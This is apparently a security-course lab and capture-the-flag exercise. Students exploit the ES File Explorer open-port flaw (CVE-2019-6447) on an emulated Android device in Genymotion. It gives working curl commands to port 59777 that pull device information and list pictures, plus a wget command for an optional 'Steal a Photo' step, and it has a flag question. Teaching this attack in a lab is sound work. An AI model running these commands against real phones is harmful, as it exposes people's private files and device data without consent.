M 207: ES Explorer Command Injection (10 pts)

What You Need for This Project

Background

ES File Explorer is very popular, with over 100 million downloads. However, it exposes your phone to remote control over the network.

Here is the writeup describing the vulnerability: ES File Explorer Open Port Vulnerability - CVE-2019-6447

It's very easy to see and exploit.

This was a zero-day exploit when it was dropped on Twitter on Jan. 16, 2019:

Start VMware

Always launch your Kali virtual machine before you start Genymotion, to avoid VirtualBox networking errors.

Installing the App

It was reported that the app was patched on Jan. 18, 2019, so download an archived vulnerable version here.

Drag the APK file onto your Genymotion device and drop it there. Approve the application installation.

Launching the App

Launch the app.

Click Agree, ALLOW, and "START NOW", as shown below.

You see information about your files, as shown below.

Connecting to your Android Device with ADB

On Kali, in a Terminal, execute these commands, replacing the IP address with the IP address of your Genymotion Android device:
adb connect 172.16.123.154
adb devices -l
You should see your Genymotion device in the "List of devices attached", as shown below.

Viewing the Listening Process

On Kali, in a Terminal, execute these commands:
adb shell
netstat -pant | grep LISTEN
exit
You see a process named "com.estrongs.android.pop" listening on port 59777,

The Attack

On Kali, in a Terminal, execute this command, replacing the IP address with the IP address of your Genymotion Android device:
curl --header "Content-Type: application/json" --request POST --data '{"command":"getDeviceInfo"}' http://172.16.123.154:59777
You see information about your phone, as shown below.


M 207: ftpPort (10 pts)

Find the text covered by a green box in the image above. That's the flag.


Optional: Steal a Photo

If you have a webcam, you can do this.

In Genymotion, on the right side, click the Webcam icon, colored pink in the image below.

Adjust the camera to access your host system's webcam, as shown below.

On your Android device, open the Camera app and take a photo, as shown below.

On Kali, in a Terminal, execute this command, replacing the IP address with the IP address of your Genymotion Android device:

curl --header "Content-Type: application/json" --request POST --data '{"command":"listPics"}' http://172.16.123.154:59777
Find the path to your image in the output, as shown below.

On Kali, in a Terminal, execute this command, replacing the IP address and path to the correct values for your system:

wget http://172.16.123.154:59777//storage/emulated/0/DCIM/Camera/IMG_20190116_141301.jpg
The file downloads, as shown below.

On Kali, in a Terminal, execute this command to view the file, replacing the filename with the correct name on your system:

xdg-open IMG_20190116_141301.jpg
The file appears, as shown below.

Testing Security Apps

A student asked what defense will stop this attack. I can't find any app that does it. You could, of course, configure iptables from the command-line, but I haven't found any app that works.

Here's what I tried, and none of them stopped the attack, as of Jan 17, 2019.


Converted to a CTF 2-28-19